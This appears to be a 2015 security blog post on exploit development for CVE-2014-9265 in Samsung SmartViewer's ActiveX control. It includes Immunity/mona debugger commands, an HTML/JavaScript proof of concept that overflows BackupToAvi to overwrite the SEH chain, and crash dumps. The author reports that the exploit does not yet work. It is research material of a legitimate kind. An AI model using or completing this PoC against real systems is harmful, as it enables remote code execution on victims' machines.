Sunday, January 18, 2015

Samsung SmartViewer BackupToAvi Remote Code Execution PoC (CVE-2014-9265)

This blog is about CVE-2014-9265.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265

What Samsung says about the software
"SmartViewer is DVR management software that enables you to connect to and control a remote Samsung DVR on your PC via the network. With this tool, you can access Samsung DVRs anywhere around the world via the network, and check the video data from the connected cameras. You can also search for and play recording data in the DVR on a remote site, which will be an effective and convenient monitoring system."

Lets load single vulnerable DLL , C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll into ImmunityDBG.

mona plugins help can be viewed with below command
!mona 
           modules / mod        | Show all loaded modules and their properties
           unicodealign / ua    | Generate venetian alignment code for unicode stack buffer overflow
Displays the list of all the loaded modules and their properties (ASLR, SafeSEH etc).
!mona modules
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Module info :
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    0x774d0000 | 0x7754b000 | 0x0007b000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [COMDLG32.dll](C:\Windows\system32\COMDLG32.dll)
0BADF00D    0x10000000 | 0x1017b000 | 0x0017b000 | False  | False   | False |  False   | False  | 2.0.1.6 [CNC_Ctrl_STW.dll] (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
0BADF00D    0x75c60000 | 0x75d34000 | 0x000d4000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)

!mona ua
will generate venetian_alignment.txt at C:\Program Files\Immunity Inc\Immunity Debugger\

mona command to search for addresses with pop/pop/ret
!mona findwild -s "pop r32#*#pop r32#*#retn"
Above command  will generate findwild.txt file located at
C:\Program Files\Immunity Inc\Immunity Debugger\

Only one address(shown below) which has unicode compatibility is useful to us.
0x10008700 : pop ecx # mov eax,esi # pop esi # retn 4 | null,unicodereverse {PAGE_EXECUTE_READ} [CNC_Ctrl_STW.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v2.0.1.6 (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)

Conditional breakpoint can be set using, assuming EIP holds 0x10008700 though EIP is having 0x00100087
bp 10008700 "j @eip=0x10008700 ; 'g' " 

Finding offset to EIP
Initially pass a character string of length 15000 to BackupToAvi API, use Metasploit cyclic pattern to find the offset where EIP is overwritten, in my case it is offset 156. To find offset execute !exchain", search for the characters located at address 0x045ad62c, im metasploit cyclic pattern to get the offset.

Once we know the offset to seh, nseh we can write a PoC as shown below
<html>
<head> Samsung SmartViewer BackupToAvi Remote Code Execution</head>
<title> PoC developed by Praveen Darshanam </title>
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' >
</object>

<script >
 var payload_length = 15000;
 var arg1=1;
 var arg2=1;
 var arg3=1;
 //blank strings
 var junk = "";
 var buf1 = "";
 var buf2 = "";

 //offset to SE is 156, initial analysis using metasploit cyclic pattern
 for (i=0; i<156; i++)
 {
  buf1 += "A";
 }

 var nseh = "DD";
//vulnerable DLL
var seh = "\x87\x10"; //pop, pop, ret
 junk = buf1 + nseh + seh;

 //remaining buffer
 for (j=0; j<(payload_length-junk.length); j++)
 {
  buf2 += "B";
 }
 var fbuff = junk + buf2;
 target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);

</script>
</html>
When we open above html file in browser, we get below trace
Tested on Windows 7 Ultimate N SP1 using Internet Explorer 8)

(c6c.418): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00450045 edx=773771cd esi=00000000 edi=00000000
eip=00450045 esp=043b10a8 ebp=043b10c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
00450045 ??              ???

0:005> !exchain
....
045abacc: ntdll!ExecuteHandler2+3a (773771cd)
045abeb4: ntdll!ExecuteHandler2+3a (773771cd)
045ac29c: ntdll!ExecuteHandler2+3a (773771cd)
045ac684: ntdll!ExecuteHandler2+3a (773771cd)
045ad62c: 00450045
Invalid exception stack at 00440044

0:005> d 045ad62c
045ad62c  44 00 44 00 45 00 45 00-42 00 42 00 42 00 42 00  D.D.E.E.B.B.B.B.
045ad63c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad64c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad65c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad66c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad67c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad68c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad69c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.

Couldn't write working exploit because of the issues mentioned below.
Issue1:
None of the registers are pointing to controlled buffer at the time of crash, can be verified using "d reg_name" on windbg cli where reg_name might be eax, ebx, esp, edi etc.

var nseh = "DD";
var seh = "\x87\x10";      //0x10008700
045ad62c  44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.

Issue2:
0x10008700 points to pop/pop/ret but eip is getting 0x00100087 instead of 0x10008700

Facing issue 2 on Windows XP Pro SP3 also
0:008> !exchain
020bf798: 00100087
Invalid exception stack at 00440044
0:008> d 020bf798
020bf798  44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00  D.D.....B.B.B.B.
020bf7a8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7b8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7c8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7d8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7e8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7f8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf808  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.

Any hints to develop working exploit are most welcome!